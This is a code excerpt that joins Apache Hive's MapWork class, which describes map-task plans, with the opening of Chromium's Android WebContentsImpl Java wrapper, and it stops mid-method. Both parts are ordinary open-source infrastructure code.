import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.hive.conf.HiveConf;
import org.apache.hadoop.hive.ql.exec.FileSinkOperator;
import org.apache.hadoop.hive.ql.exec.Operator;
import org.apache.hadoop.hive.ql.exec.OperatorUtils;
import org.apache.hadoop.hive.ql.optimizer.physical.BucketingSortingCtx.BucketCol;
import org.apache.hadoop.hive.ql.optimizer.physical.BucketingSortingCtx.SortCol;
import org.apache.hadoop.hive.ql.parse.SplitSample;
import org.apache.hadoop.mapred.JobConf;
import com.google.common.collect.Interner;
/**
* MapWork represents all the information used to run a map task on the cluster.
* It is first used when the query planner breaks the logical plan into tasks and
* used throughout physical optimization to track map-side operator plans, input
* paths, aliases, etc.
*
* ExecDriver will serialize the contents of this class and make sure it is
* distributed on the cluster. The ExecMapper will ultimately deserialize this
* class on the data nodes and setup it's operator pipeline accordingly.
*
* This class is also used in the explain command any property with the
* appropriate annotation will be displayed in the explain output.
*/
@SuppressWarnings({"serial", "deprecation"})
public class MapWork extends BaseWork {
private static final Log LOG = LogFactory.getLog(MapWork.class);
private boolean hadoopSupportsSplittable;
// use LinkedHashMap to make sure the iteration order is
// deterministic, to ease testing
private LinkedHashMap<String, ArrayList<String>> pathToAliases = new LinkedHashMap<String, ArrayList<String>>();
private LinkedHashMap<String, PartitionDesc> pathToPartitionInfo = new LinkedHashMap<String, PartitionDesc>();
private LinkedHashMap<String, Operator<? extends OperatorDesc>> aliasToWork = new LinkedHashMap<String, Operator<? extends OperatorDesc>>();
private LinkedHashMap<String, PartitionDesc> aliasToPartnInfo = new LinkedHashMap<String, PartitionDesc>();
private HashMap<String, SplitSample> nameToSplitSample = new LinkedHashMap<String, SplitSample>();
// If this map task has a FileSinkOperator, and bucketing/sorting metadata can be
// inferred about the data being written by that operator, these are mappings from the directory
// that operator writes into to the bucket/sort columns for that data.
private final Map<String, List<BucketCol>> bucketedColsByDirectory =
new HashMap<String, List<BucketCol>>();
private final Map<String, List<SortCol>> sortedColsByDirectory =
new HashMap<String, List<SortCol>>();
private Path tmpHDFSPath;
private String inputformat;
private String indexIntermediateFile;
private Integer numMapTasks;
private Long maxSplitSize;
private Long minSplitSize;
private Long minSplitSizePerNode;
private Long minSplitSizePerRack;
//use sampled partitioning
private int samplingType;
public static final int SAMPLING_ON_PREV_MR = 1; // todo HIVE-3841
public static final int SAMPLING_ON_START = 2; // sampling on task running
// the following two are used for join processing
private boolean leftInputJoin;
private String[] baseSrc;
private List<String> mapAliases;
private boolean mapperCannotSpanPartns;
// used to indicate the input is sorted, and so a BinarySearchRecordReader shoudl be used
private boolean inputFormatSorted = false;
private boolean useBucketizedHiveInputFormat;
private boolean useOneNullRowInputFormat;
private boolean dummyTableScan = false;
// used for dynamic partitioning
private Map<String, List<TableDesc>> eventSourceTableDescMap =
new LinkedHashMap<String, List<TableDesc>>();
private Map<String, List<String>> eventSourceColumnNameMap =
new LinkedHashMap<String, List<String>>();
private Map<String, List<ExprNodeDesc>> eventSourcePartKeyExprMap =
new LinkedHashMap<String, List<ExprNodeDesc>>();
private boolean doSplitsGrouping = true;
public MapWork() {}
public MapWork(String name) {
super(name);
}
@Explain(displayName = "Path -> Alias", normalExplain = false)
public LinkedHashMap<String, ArrayList<String>> getPathToAliases() {
return pathToAliases;
}
public void setPathToAliases(
final LinkedHashMap<String, ArrayList<String>> pathToAliases) {
this.pathToAliases = pathToAliases;
}
/**
* This is used to display and verify output of "Path -> Alias" in test framework.
*
* QTestUtil masks "Path -> Alias" and makes verification impossible.
* By keeping "Path -> Alias" intact and adding a new display name which is not
* masked by QTestUtil by removing prefix.
*
* Notes: we would still be masking for intermediate directories.
*
* @return
*/
@Explain(displayName = "Truncated Path -> Alias", normalExplain = false)
public Map<String, ArrayList<String>> getTruncatedPathToAliases() {
Map<String, ArrayList<String>> trunPathToAliases = new LinkedHashMap<String,
ArrayList<String>>();
Iterator<Entry<String, ArrayList<String>>> itr = this.pathToAliases.entrySet().iterator();
while (itr.hasNext()) {
final Entry<String, ArrayList<String>> entry = itr.next();
String origiKey = entry.getKey();
String newKey = PlanUtils.removePrefixFromWarehouseConfig(origiKey);
ArrayList<String> value = entry.getValue();
trunPathToAliases.put(newKey, value);
}
return trunPathToAliases;
}
@Explain(displayName = "Path -> Partition", normalExplain = false)
public LinkedHashMap<String, PartitionDesc> getPathToPartitionInfo() {
return pathToPartitionInfo;
}
public void setPathToPartitionInfo(
final LinkedHashMap<String, PartitionDesc> pathToPartitionInfo) {
this.pathToPartitionInfo = pathToPartitionInfo;
}
/**
* Derive additional attributes to be rendered by EXPLAIN.
* TODO: this method is relied upon by custom input formats to set jobconf properties.
* This is madness? - This is Hive Storage Handlers!
*/
public void deriveExplainAttributes() {
if (pathToPartitionInfo != null) {
for (Map.Entry<String, PartitionDesc> entry : pathToPartitionInfo
.entrySet()) {
entry.getValue().deriveBaseFileName(entry.getKey());
}
}
MapredLocalWork mapLocalWork = getMapRedLocalWork();
if (mapLocalWork != null) {
mapLocalWork.deriveExplainAttributes();
}
}
public void internTable(Interner<TableDesc> interner) {
if (aliasToPartnInfo != null) {
for (PartitionDesc part : aliasToPartnInfo.values()) {
if (part == null) {
continue;
}
part.intern(interner);
}
}
if (pathToPartitionInfo != null) {
for (PartitionDesc part : pathToPartitionInfo.values()) {
part.intern(interner);
}
}
}
/**
* @return the aliasToPartnInfo
*/
public LinkedHashMap<String, PartitionDesc> getAliasToPartnInfo() {
return aliasToPartnInfo;
}
/**
* @param aliasToPartnInfo
* the aliasToPartnInfo to set
*/
public void setAliasToPartnInfo(
LinkedHashMap<String, PartitionDesc> aliasToPartnInfo) {
this.aliasToPartnInfo = aliasToPartnInfo;
}
public LinkedHashMap<String, Operator<? extends OperatorDesc>> getAliasToWork() {
return aliasToWork;
}
public void setAliasToWork(
final LinkedHashMap<String, Operator<? extends OperatorDesc>> aliasToWork) {
this.aliasToWork = aliasToWork;
}
@Explain(displayName = "Split Sample", normalExplain = false)
public HashMap<String, SplitSample> getNameToSplitSample() {
return nameToSplitSample;
}
public void setNameToSplitSample(HashMap<String, SplitSample> nameToSplitSample) {
this.nameToSplitSample = nameToSplitSample;
}
public Integer getNumMapTasks() {
return numMapTasks;
}
public void setNumMapTasks(Integer numMapTasks) {
this.numMapTasks = numMapTasks;
}
@SuppressWarnings("nls")
public void addMapWork(String path, String alias, Operator<?> work,
PartitionDesc pd) {
ArrayList<String> curAliases = pathToAliases.get(path);
if (curAliases == null) {
assert (pathToPartitionInfo.get(path) == null);
curAliases = new ArrayList<String>();
pathToAliases.put(path, curAliases);
pathToPartitionInfo.put(path, pd);
} else {
assert (pathToPartitionInfo.get(path) != null);
}
for (String oneAlias : curAliases) {
if (oneAlias.equals(alias)) {
throw new RuntimeException("Multiple aliases named: " + alias
+ " for path: " + path);
}
}
curAliases.add(alias);
if (aliasToWork.get(alias) != null) {
throw new RuntimeException("Existing work for alias: " + alias);
}
aliasToWork.put(alias, work);
}
public boolean isInputFormatSorted() {
return inputFormatSorted;
}
public void setInputFormatSorted(boolean inputFormatSorted) {
this.inputFormatSorted = inputFormatSorted;
}
public void resolveDynamicPartitionStoredAsSubDirsMerge(HiveConf conf, Path path,
TableDesc tblDesc, ArrayList<String> aliases, PartitionDesc partDesc) {
pathToAliases.put(path.toString(), aliases);
pathToPartitionInfo.put(path.toString(), partDesc);
}
/**
* For each map side operator - stores the alias the operator is working on
* behalf of in the operator runtime state. This is used by reduce sink
* operator - but could be useful for debugging as well.
*/
private void setAliases() {
if(aliasToWork == null) {
return;
}
for (String oneAlias : aliasToWork.keySet()) {
aliasToWork.get(oneAlias).setAlias(oneAlias);
}
}
@Explain(displayName = "Execution mode")
public String getVectorModeOn() {
return vectorMode ? "vectorized" : null;
}
@Override
public void replaceRoots(Map<Operator<?>, Operator<?>> replacementMap) {
LinkedHashMap<String, Operator<?>> newAliasToWork = new LinkedHashMap<String, Operator<?>>();
for (Map.Entry<String, Operator<?>> entry: aliasToWork.entrySet()) {
newAliasToWork.put(entry.getKey(), replacementMap.get(entry.getValue()));
}
setAliasToWork(newAliasToWork);
}
@Override
@Explain(displayName = "Map Operator Tree")
public Set<Operator<?>> getAllRootOperators() {
Set<Operator<?>> opSet = new LinkedHashSet<Operator<?>>();
Map<String, ArrayList<String>> pa = getPathToAliases();
if (pa != null) {
for (List<String> ls : pa.values()) {
for (String a : ls) {
Operator<?> op = getAliasToWork().get(a);
if (op != null ) {
opSet.add(op);
}
}
}
}
return opSet;
}
public void mergeAliasedInput(String alias, String pathDir, PartitionDesc partitionInfo) {
ArrayList<String> aliases = pathToAliases.get(pathDir);
if (aliases == null) {
aliases = new ArrayList<String>(Arrays.asList(alias));
pathToAliases.put(pathDir, aliases);
pathToPartitionInfo.put(pathDir, partitionInfo);
} else {
aliases.add(alias);
}
}
public void initialize() {
setAliases();
}
public Long getMaxSplitSize() {
return maxSplitSize;
}
public void setMaxSplitSize(Long maxSplitSize) {
this.maxSplitSize = maxSplitSize;
}
public Long getMinSplitSize() {
return minSplitSize;
}
public void setMinSplitSize(Long minSplitSize) {
this.minSplitSize = minSplitSize;
}
public Long getMinSplitSizePerNode() {
return minSplitSizePerNode;
}
public void setMinSplitSizePerNode(Long minSplitSizePerNode) {
this.minSplitSizePerNode = minSplitSizePerNode;
}
public Long getMinSplitSizePerRack() {
return minSplitSizePerRack;
}
public void setMinSplitSizePerRack(Long minSplitSizePerRack) {
this.minSplitSizePerRack = minSplitSizePerRack;
}
public String getInputformat() {
return inputformat;
}
public void setInputformat(String inputformat) {
this.inputformat = inputformat;
}
public boolean isUseBucketizedHiveInputFormat() {
return useBucketizedHiveInputFormat;
}
public void setUseBucketizedHiveInputFormat(boolean useBucketizedHiveInputFormat) {
this.useBucketizedHiveInputFormat = useBucketizedHiveInputFormat;
}
public void setUseOneNullRowInputFormat(boolean useOneNullRowInputFormat) {
this.useOneNullRowInputFormat = useOneNullRowInputFormat;
}
public boolean isUseOneNullRowInputFormat() {
return useOneNullRowInputFormat;
}
public void setMapperCannotSpanPartns(boolean mapperCannotSpanPartns) {
this.mapperCannotSpanPartns = mapperCannotSpanPartns;
}
public boolean isMapperCannotSpanPartns() {
return this.mapperCannotSpanPartns;
}
public boolean getHadoopSupportsSplittable() {
return hadoopSupportsSplittable;
}
public void setHadoopSupportsSplittable(boolean hadoopSupportsSplittable) {
this.hadoopSupportsSplittable = hadoopSupportsSplittable;
}
public String getIndexIntermediateFile() {
return indexIntermediateFile;
}
public ArrayList<String> getAliases() {
return new ArrayList<String>(aliasToWork.keySet());
}
public ArrayList<Operator<?>> getWorks() {
return new ArrayList<Operator<?>>(aliasToWork.values());
}
public ArrayList<String> getPaths() {
return new ArrayList<String>(pathToAliases.keySet());
}
public ArrayList<PartitionDesc> getPartitionDescs() {
return new ArrayList<PartitionDesc>(aliasToPartnInfo.values());
}
public Path getTmpHDFSPath() {
return tmpHDFSPath;
}
public void setTmpHDFSPath(Path tmpHDFSPath) {
this.tmpHDFSPath = tmpHDFSPath;
}
public void mergingInto(MapWork mapWork) {
// currently, this is sole field affecting mergee task
mapWork.useBucketizedHiveInputFormat |= useBucketizedHiveInputFormat;
}
@Explain(displayName = "Path -> Bucketed Columns", normalExplain = false)
public Map<String, List<BucketCol>> getBucketedColsByDirectory() {
return bucketedColsByDirectory;
}
@Explain(displayName = "Path -> Sorted Columns", normalExplain = false)
public Map<String, List<SortCol>> getSortedColsByDirectory() {
return sortedColsByDirectory;
}
public void addIndexIntermediateFile(String fileName) {
if (this.indexIntermediateFile == null) {
this.indexIntermediateFile = fileName;
} else {
this.indexIntermediateFile += "," + fileName;
}
}
public int getSamplingType() {
return samplingType;
}
public void setSamplingType(int samplingType) {
this.samplingType = samplingType;
}
@Explain(displayName = "Sampling", normalExplain = false)
public String getSamplingTypeString() {
return samplingType == 1 ? "SAMPLING_ON_PREV_MR" :
samplingType == 2 ? "SAMPLING_ON_START" : null;
}
@Override
public void configureJobConf(JobConf job) {
for (PartitionDesc partition : aliasToPartnInfo.values()) {
PlanUtils.configureJobConf(partition.getTableDesc(), job);
}
Collection<Operator<?>> mappers = aliasToWork.values();
for (FileSinkOperator fs : OperatorUtils.findOperators(mappers, FileSinkOperator.class)) {
PlanUtils.configureJobConf(fs.getConf().getTableInfo(), job);
}
}
public void logPathToAliases() {
if (LOG.isDebugEnabled()) {
LOG.debug("LOGGING PATH TO ALIASES");
for (Map.Entry<String, ArrayList<String>> entry: pathToAliases.entrySet()) {
for (String a: entry.getValue()) {
LOG.debug("Path: " + entry.getKey() + ", Alias: " + a);
}
}
}
}
public void setDummyTableScan(boolean dummyTableScan) {
this.dummyTableScan = dummyTableScan;
}
public boolean getDummyTableScan() {
return dummyTableScan;
}
public void setEventSourceTableDescMap(Map<String, List<TableDesc>> map) {
this.eventSourceTableDescMap = map;
}
public Map<String, List<TableDesc>> getEventSourceTableDescMap() {
return eventSourceTableDescMap;
}
public void setEventSourceColumnNameMap(Map<String, List<String>> map) {
this.eventSourceColumnNameMap = map;
}
public Map<String, List<String>> getEventSourceColumnNameMap() {
return eventSourceColumnNameMap;
}
public Map<String, List<ExprNodeDesc>> getEventSourcePartKeyExprMap() {
return eventSourcePartKeyExprMap;
}
public void setEventSourcePartKeyExprMap(Map<String, List<ExprNodeDesc>> map) {
this.eventSourcePartKeyExprMap = map;
}
public void setDoSplitsGrouping(boolean doSplitsGrouping) {
this.doSplitsGrouping = doSplitsGrouping;
}
public boolean getDoSplitsGrouping() {
return this.doSplitsGrouping;
}
public boolean isLeftInputJoin() {
return leftInputJoin;
}
public void setLeftInputJoin(boolean leftInputJoin) {
this.leftInputJoin = leftInputJoin;
}
public String[] getBaseSrc() {
return baseSrc;
}
public void setBaseSrc(String[] baseSrc) {
this.baseSrc = baseSrc;
}
public List<String> getMapAliases() {
return mapAliases;
}
public void setMapAliases(List<String> mapAliases) {
this.mapAliases = mapAliases;
}
}
|
|
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
package org.chromium.content.browser.webcontents;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.Bitmap;
import android.graphics.Rect;
import android.os.Bundle;
import android.os.Handler;
import android.os.Message;
import android.os.Parcel;
import android.os.ParcelUuid;
import android.os.Parcelable;
import android.view.Surface;
import android.view.ViewStructure;
import androidx.annotation.Nullable;
import androidx.annotation.VisibleForTesting;
import org.chromium.base.Log;
import org.chromium.base.ThreadUtils;
import org.chromium.base.UserData;
import org.chromium.base.UserDataHost;
import org.chromium.base.annotations.CalledByNative;
import org.chromium.base.annotations.JNINamespace;
import org.chromium.base.annotations.NativeMethods;
import org.chromium.blink_public.input.SelectionGranularity;
import org.chromium.content.browser.AppWebMessagePort;
import org.chromium.content.browser.MediaSessionImpl;
import org.chromium.content.browser.RenderCoordinatesImpl;
import org.chromium.content.browser.RenderWidgetHostViewImpl;
import org.chromium.content.browser.ViewEventSinkImpl;
import org.chromium.content.browser.WindowEventObserver;
import org.chromium.content.browser.WindowEventObserverManager;
import org.chromium.content.browser.accessibility.ViewStructureBuilder;
import org.chromium.content.browser.accessibility.WebContentsAccessibilityImpl;
import org.chromium.content.browser.framehost.RenderFrameHostDelegate;
import org.chromium.content.browser.framehost.RenderFrameHostImpl;
import org.chromium.content.browser.selection.SelectionPopupControllerImpl;
import org.chromium.content_public.browser.ChildProcessImportance;
import org.chromium.content_public.browser.GlobalRenderFrameHostId;
import org.chromium.content_public.browser.ImageDownloadCallback;
import org.chromium.content_public.browser.JavaScriptCallback;
import org.chromium.content_public.browser.MessagePort;
import org.chromium.content_public.browser.NavigationController;
import org.chromium.content_public.browser.RenderFrameHost;
import org.chromium.content_public.browser.ViewEventSink.InternalAccessDelegate;
import org.chromium.content_public.browser.Visibility;
import org.chromium.content_public.browser.WebContents;
import org.chromium.content_public.browser.WebContentsInternals;
import org.chromium.content_public.browser.WebContentsObserver;
import org.chromium.ui.OverscrollRefreshHandler;
import org.chromium.ui.base.EventForwarder;
import org.chromium.ui.base.ViewAndroidDelegate;
import org.chromium.ui.base.WindowAndroid;
import org.chromium.url.GURL;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.UUID;
/**
* The WebContentsImpl Java wrapper to allow communicating with the native WebContentsImpl
* object.
*/
@JNINamespace("content")
public class WebContentsImpl implements WebContents, RenderFrameHostDelegate, WindowEventObserver {
private static final String TAG = "WebContentsImpl";
private static final String PARCEL_VERSION_KEY = "version";
private static final String PARCEL_WEBCONTENTS_KEY = "webcontents";
private static final String PARCEL_PROCESS_GUARD_KEY = "processguard";
private static final long PARCELABLE_VERSION_ID = 0;
// Non-final for testing purposes, so resetting of the UUID can happen.
private static UUID sParcelableUUID = UUID.randomUUID();
/**
* Used to reset the internal tracking for whether or not a serialized {@link WebContents}
* was created in this process or not.
*/
@VisibleForTesting
public static void invalidateSerializedWebContentsForTesting() {
sParcelableUUID = UUID.randomUUID();
}
/**
* A {@link android.os.Parcelable.Creator} instance that is used to build
* {@link WebContentsImpl} objects from a {@link Parcel}.
*/
// TODO(crbug.com/635567): Fix this properly.
@SuppressLint("ParcelClassLoader")
public static final Parcelable.Creator<WebContents> CREATOR =
new Parcelable.Creator<WebContents>() {
@Override
public WebContents createFromParcel(Parcel source) {
Bundle bundle = source.readBundle();
// Check the version.
if (bundle.getLong(PARCEL_VERSION_KEY, -1) != 0) return null;
// Check that we're in the same process.
ParcelUuid parcelUuid = bundle.getParcelable(PARCEL_PROCESS_GUARD_KEY);
if (sParcelableUUID.compareTo(parcelUuid.getUuid()) != 0) return null;
// Attempt to retrieve the WebContents object from the native pointer.
return WebContentsImplJni.get().fromNativePtr(
bundle.getLong(PARCEL_WEBCONTENTS_KEY));
}
@Override
public WebContents[] newArray(int size) {
return new WebContents[size];
}
};
/**
* Factory interface passed to {@link #getOrSetUserData()} for instantiation of
* class as user data.
*
* Constructor method reference comes handy for class Foo to provide the factory.
* Use lazy initialization to avoid having to generate too many anonymous references.
*
* <code>
* public class Foo {
* static final class FoofactoryLazyHolder {
* private static final UserDataFactory<Foo> INSTANCE = Foo::new;
* }
* ....
*
* webContents.getOrsetUserData(Foo.class, FooFactoryLazyHolder.INSTANCE);
*
* ....
* }
* </code>
*
* @param <T> Class to instantiate.
*/
public interface UserDataFactory<T> { T create(WebContents webContents); }
// Note this list may be incomplete. Frames that never had to initialize java side would
// not have an entry here. This is here mainly to keep the java RenderFrameHosts alive, since
// native side generally cannot safely hold strong references to them.
private final List<RenderFrameHostImpl> mFrames = new ArrayList<>();
private long mNativeWebContentsAndroid;
private NavigationController mNavigationController;
// Lazily created proxy observer for handling all Java-based WebContentsObservers.
private WebContentsObserverProxy mObserverProxy;
// The media session for this WebContents. It is constructed by the native MediaSession and has
// the same life time as native MediaSession.
private MediaSessionImpl mMediaSession;
class SmartClipCallback {
public SmartClipCallback(final Handler smartClipHandler) {
mHandler = smartClipHandler;
}
public void onSmartClipDataExtracted(String text, String html, Rect clipRect) {
// The clipRect is in dip scale here. Add the contentOffset in same scale.
RenderCoordinatesImpl coordinateSpace = getRenderCoordinates();
clipRect.offset(0,
(int) (coordinateSpace.getContentOffsetYPix()
/ coordinateSpace.getDeviceScaleFactor()));
Bundle bundle = new Bundle();
bundle.putString("url", getVisibleUrl().getSpec());
bundle.putString("title", getTitle());
bundle.putString("text", text);
bundle.putString("html", html);
bundle.putParcelable("rect", clipRect);
Message msg = Message.obtain(mHandler, 0);
msg.setData(bundle);
msg.sendToTarget();
}
final Handler mHandler;
}
private SmartClipCallback mSmartClipCallback;
private EventForwarder mEventForwarder;
// Cached copy of all positions and scales as reported by the renderer.
private RenderCoordinatesImpl mRenderCoordinates;
private InternalsHolder mInternalsHolder;
private String mProductVersion;
private boolean mInitialized;
// Remember the stack for clearing native the native stack for debugging use after destroy.
private Throwable mNativeDestroyThrowable;
private static class WebContentsInternalsImpl implements WebContentsInternals {
public UserDataHost userDataHost;
public ViewAndroidDelegate viewAndroidDelegate;
}
private WebContentsImpl(
long nativeWebContentsAndroid, NavigationController navigationController) {
assert nativeWebContentsAndroid != 0;
mNativeWebContentsAndroid = nativeWebContentsAndroid;
mNavigationController = navigationController;
}
@CalledByNative
private static WebContentsImpl create(
long nativeWebContentsAndroid, NavigationController navigationController) {
return new WebContentsImpl(nativeWebContentsAndroid, navigationController);
}
@Override
public void initialize(String productVersion, ViewAndroidDelegate viewDelegate,
InternalAccessDelegate accessDelegate, WindowAndroid windowAndroid,
InternalsHolder internalsHolder) {
assert internalsHolder != null;
mProductVersion = productVersion;
WebContentsInternalsImpl internals;
if (mInternalsHolder != null) {
internals = (WebContentsInternalsImpl) mInternalsHolder.get();
} else {
internals = new WebContentsInternalsImpl();
internals.userDataHost = new UserDataHost();
}
mInternalsHolder = internalsHolder;
mInternalsHolder.set(internals);
if (mRenderCoordinates == null) {
mRenderCoordinates = new RenderCoordinatesImpl();
}
mInitialized = true;
setViewAndroidDelegate(viewDelegate);
setTopLevelNativeWindow(windowAndroid);
if (accessDelegate == null) {
accessDelegate = new EmptyInternalAccessDelegate();
}
ViewEventSinkImpl.from(this).setAccessDelegate(accessDelegate);
if (windowAndroid != null) {
getRenderCoordinates().setDeviceScaleFactor(windowAndroid.getDisplay().getDipScale());
}
}
@Override
public void clearJavaWebContentsObservers() {
// Clear all the Android specific observers.
if (mObserverProxy != null) {
mObserverProxy.destroy();
mObserverProxy = null;
}
}
@Nullable
public Context getContext() {
assert mInitialized;
WindowAndroid window = getTopLevelNativeWindow();
return window != null ? window.getContext().get() : null;
}
public String getProductVersion() {
assert mInitialized;
return mProductVersion;
}
@CalledByNative
private void clearNativePtr() {
mNativeDestroyThrowable = new RuntimeException("clearNativePtr");
mNativeWebContentsAndroid = 0;
mNavigationController = null;
if (mObserverProxy != null) {
mObserverProxy.destroy();
mObserverProxy = null;
}
}
// =================== RenderFrameHostDelegate overrides ===================
@Override
public void renderFrameCreated(RenderFrameHostImpl host) {
assert !mFrames.contains(host);
mFrames.add(host);
}
@Override
public void renderFrameDeleted(RenderFrameHostImpl host) {
assert mFrames.contains(host);
mFrames.remove(host);
}
// ================= end RenderFrameHostDelegate overrides =================
@Override
public int describeContents() {
return 0;
}
@Override
public void writeToParcel(Parcel dest, int flags) {
// This is wrapped in a Bundle so that failed deserialization attempts don't corrupt the
// overall Parcel. If we failed a UUID or Version check and didn't read the rest of the
// fields it would corrupt the serialized stream.
Bundle data = new Bundle();
data.putLong(PARCEL_VERSION_KEY, PARCELABLE_VERSION_ID);
data.putParcelable(PARCEL_PROCESS_GUARD_KEY, new ParcelUuid(sParcelableUUID));
data.putLong(PARCEL_WEBCONTENTS_KEY, mNativeWebContentsAndroid);
dest.writeBundle(data);
}
@CalledByNative
private long getNativePointer() {
return mNativeWebContentsAndroid;
}
@Override
public WindowAndroid getTopLevelNativeWindow() {
checkNotDestroyed();
return WebContentsImplJni.get().getTopLevelNativeWindow(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void setTopLevelNativeWindow(WindowAndroid windowAndroid) {
checkNotDestroyed();
WebContentsImplJni.get().setTopLevelNativeWindow(
mNativeWebContentsAndroid, WebContentsImpl.this, windowAndroid);
WindowEventObserverManager.from(this).onWindowAndroidChanged(windowAndroid);
if (mObserverProxy != null) mObserverProxy.onTopLevelNativeWindowChanged(windowAndroid);
}
@Override
public ViewAndroidDelegate getViewAndroidDelegate() {
WebContentsInternals internals = mInternalsHolder.get();
if (internals == null) return null;
return ((WebContentsInternalsImpl) internals).viewAndroidDelegate;
}
private void setViewAndroidDelegate(ViewAndroidDelegate viewDelegate) {
checkNotDestroyed();
WebContentsInternals internals = mInternalsHolder.get();
assert internals != null;
WebContentsInternalsImpl impl = (WebContentsInternalsImpl) internals;
impl.viewAndroidDelegate = viewDelegate;
WebContentsImplJni.get().setViewAndroidDelegate(
mNativeWebContentsAndroid, WebContentsImpl.this, viewDelegate);
}
@Override
public void destroy() {
// Note that |WebContents.destroy| is not guaranteed to be invoked.
// Any resource release relying on this method will likely be leaked.
if (!ThreadUtils.runningOnUiThread()) {
throw new IllegalStateException("Attempting to destroy WebContents on non-UI thread");
}
if (mNativeWebContentsAndroid != 0) {
WebContentsImplJni.get().destroyWebContents(mNativeWebContentsAndroid);
}
}
@Override
public boolean isDestroyed() {
return mNativeWebContentsAndroid == 0
|| WebContentsImplJni.get().isBeingDestroyed(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void clearNativeReference() {
if (mNativeWebContentsAndroid != 0) {
WebContentsImplJni.get().clearNativeReference(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
}
@Override
public NavigationController getNavigationController() {
return mNavigationController;
}
@Override
public RenderFrameHost getMainFrame() {
checkNotDestroyed();
return WebContentsImplJni.get().getMainFrame(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public RenderFrameHost getFocusedFrame() {
checkNotDestroyed();
return WebContentsImplJni.get().getFocusedFrame(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public RenderFrameHost getRenderFrameHostFromId(GlobalRenderFrameHostId id) {
checkNotDestroyed();
return WebContentsImplJni.get().getRenderFrameHostFromId(
mNativeWebContentsAndroid, id.childId(), id.frameRoutingId());
}
// The RenderFrameHosts that are every RenderFrameHost in this WebContents.
// See C++'s WebContents::ForEachRenderFrameHost for details.
public List<RenderFrameHost> getAllRenderFrameHosts() {
checkNotDestroyed();
RenderFrameHost[] frames = WebContentsImplJni.get().getAllRenderFrameHosts(
mNativeWebContentsAndroid, WebContentsImpl.this);
return Collections.unmodifiableList(Arrays.asList(frames));
}
@CalledByNative
private static RenderFrameHost[] createRenderFrameHostArray(int size) {
return new RenderFrameHost[size];
}
@CalledByNative
private static void addRenderFrameHostToArray(
RenderFrameHost[] frames, int index, RenderFrameHost frame) {
frames[index] = frame;
}
@Override
public @Nullable RenderWidgetHostViewImpl getRenderWidgetHostView() {
if (mNativeWebContentsAndroid == 0) return null;
RenderWidgetHostViewImpl rwhvi = WebContentsImplJni.get().getRenderWidgetHostView(
mNativeWebContentsAndroid, WebContentsImpl.this);
if (rwhvi == null || rwhvi.isDestroyed()) return null;
return rwhvi;
}
@Override
public List<WebContentsImpl> getInnerWebContents() {
checkNotDestroyed();
WebContentsImpl[] innerWebContents = WebContentsImplJni.get().getInnerWebContents(
mNativeWebContentsAndroid, WebContentsImpl.this);
return Collections.unmodifiableList(Arrays.asList(innerWebContents));
}
@Override
public @Visibility int getVisibility() {
checkNotDestroyed();
return WebContentsImplJni.get().getVisibility(mNativeWebContentsAndroid);
}
@Override
public String getTitle() {
checkNotDestroyed();
return WebContentsImplJni.get().getTitle(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public GURL getVisibleUrl() {
checkNotDestroyed();
return WebContentsImplJni.get().getVisibleURL(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public String getEncoding() {
checkNotDestroyed();
return WebContentsImplJni.get().getEncoding(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean isLoading() {
checkNotDestroyed();
return WebContentsImplJni.get().isLoading(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public boolean shouldShowLoadingUI() {
checkNotDestroyed();
return WebContentsImplJni.get().shouldShowLoadingUI(
mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void dispatchBeforeUnload(boolean autoCancel) {
if (mNativeWebContentsAndroid == 0) return;
WebContentsImplJni.get().dispatchBeforeUnload(
mNativeWebContentsAndroid, WebContentsImpl.this, autoCancel);
}
@Override
public void stop() {
checkNotDestroyed();
WebContentsImplJni.get().stop(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Cut the selected content.
*/
public void cut() {
checkNotDestroyed();
WebContentsImplJni.get().cut(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Copy the selected content.
*/
public void copy() {
checkNotDestroyed();
WebContentsImplJni.get().copy(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Paste content from the clipboard.
*/
public void paste() {
checkNotDestroyed();
WebContentsImplJni.get().paste(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Paste content from the clipboard without format.
*/
public void pasteAsPlainText() {
checkNotDestroyed();
WebContentsImplJni.get().pasteAsPlainText(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Replace the selected text with the {@code word}.
*/
public void replace(String word) {
checkNotDestroyed();
WebContentsImplJni.get().replace(mNativeWebContentsAndroid, WebContentsImpl.this, word);
}
/**
* Select all content.
*/
public void selectAll() {
checkNotDestroyed();
WebContentsImplJni.get().selectAll(mNativeWebContentsAndroid, WebContentsImpl.this);
}
/**
* Collapse the selection to the end of selection range.
*/
public void collapseSelection() {
// collapseSelection may get triggered when certain selection-related widgets
// are destroyed. As the timing for such destruction is unpredictable,
// safely guard against this case.
if (isDestroyed()) return;
WebContentsImplJni.get().collapseSelection(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void onHide() {
checkNotDestroyed();
SelectionPopupControllerImpl controller = getSelectionPopupController();
if (controller != null) controller.hidePopupsAndPreserveSelection();
WebContentsImplJni.get().onHide(mNativeWebContentsAndroid, WebContentsImpl.this);
}
@Override
public void onShow() {
checkNotDestroyed();
WebContentsAccessibilityImpl wcax = WebContentsAccessibilityImpl.fromWebContents(this);
if (wcax != null) wcax.refreshState();
SelectionPopupControllerImpl controller = getSelectionPopupController();
if (controller != null) controller.restoreSelectionPopupsIfNecessary();
WebContentsImplJni.get().onShow(mNativeWebContentsAndroid, WebContentsImpl.this);
}
private SelectionPopupControllerImpl getSelectionPopupController() {
